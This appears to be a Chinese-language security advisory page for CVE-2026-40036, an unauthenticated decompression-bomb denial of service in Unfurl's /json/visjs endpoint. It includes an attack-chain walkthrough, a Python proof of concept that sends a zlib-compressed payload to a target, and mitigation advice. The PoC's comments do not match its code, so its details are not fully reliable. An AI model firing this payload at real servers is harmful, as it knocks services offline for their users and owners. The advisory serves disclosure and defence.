CVE-2026-40036 CVSS 7.5 高危

CVE-2026-40036 Unfurl拒绝服务漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40036

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unfurl

漏洞概述

Unfurl 2026.04之前的版本在parse_compressed.py文件中存在无限制的zlib解压缩漏洞。远程攻击者无需身份认证，利用该漏洞可向/json/visjs端点提交高度压缩的恶意载荷。由于解压过程缺乏大小限制，这些载荷在解压后会膨胀至GB级别，导致服务器内存耗尽，进而引发服务拒绝。

技术细节

该漏洞的根源在于Unfurl处理压缩数据时缺乏必要的边界检查。在parse_compressed.py模块中，程序直接对通过URL参数传入的zlib压缩数据进行解压，而未预先分配内存上限或校验解压后的大小。攻击者可以构造一种被称为“解压炸弹”的特制文件，利用zlib算法的高压缩比特性，将数GB的重复数据压缩为几KB的Payload。当服务器处理该请求时，尝试分配巨大的内存空间来存储解压结果，导致内存溢出（OOM）。根据CVSS向量分析，该攻击通过网络发起，攻击复杂度低，无需用户交互，严重影响系统的可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出运行Unfurl服务且版本低于2026.04的目标。

STEP 2

2. 构造载荷

攻击者利用zlib压缩算法生成高压缩比的恶意数据包（解压炸弹）。

STEP 3

3. 发起攻击

攻击者向目标服务器的/json/visjs端点发送包含恶意压缩数据的HTTP GET请求。

STEP 4

4. 触发漏洞

服务器解析请求并调用parse_compressed.py进行解压，内存瞬间被耗尽。

STEP 5

5. 达成目的

服务器进程因OOM崩溃，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import zlib
import requests
import urllib.parse

# Target URL
target_url = "http://target-ip:5000/json/visjs"

# Create a decompression bomb (10MB of null bytes compressed)
original_size = 10 * 1024 * 1024
bomb_data = b'\x00' * original_size
compressed_bomb = zlib.compress(bomb_data)

print(f"Original size: {len(bomb_data)} bytes")
print(f"Compressed size: {len(compressed_bomb)} bytes")

# Prepare the payload parameter
# The parameter name might vary based on actual implementation, assuming 'data'
payload = {'url_param': compressed_bomb}

try:
    # Send the malicious request
    response = requests.get(target_url, params=payload)
    print(f"Request sent, status code: {response.status_code}")
except Exception as e:
    print(f"The server likely crashed or refused the connection: {e}")

影响范围

Unfurl < 2026.04

防御指南

临时缓解措施

建议立即限制对/json/visjs端点的公网访问，仅允许可信内部IP调用。同时在应用服务器层面配置容器或进程的资源配额（Cgroups或ulimit），以防止单个请求耗尽全部系统资源。在未升级前，可临时关闭相关的URL解析功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表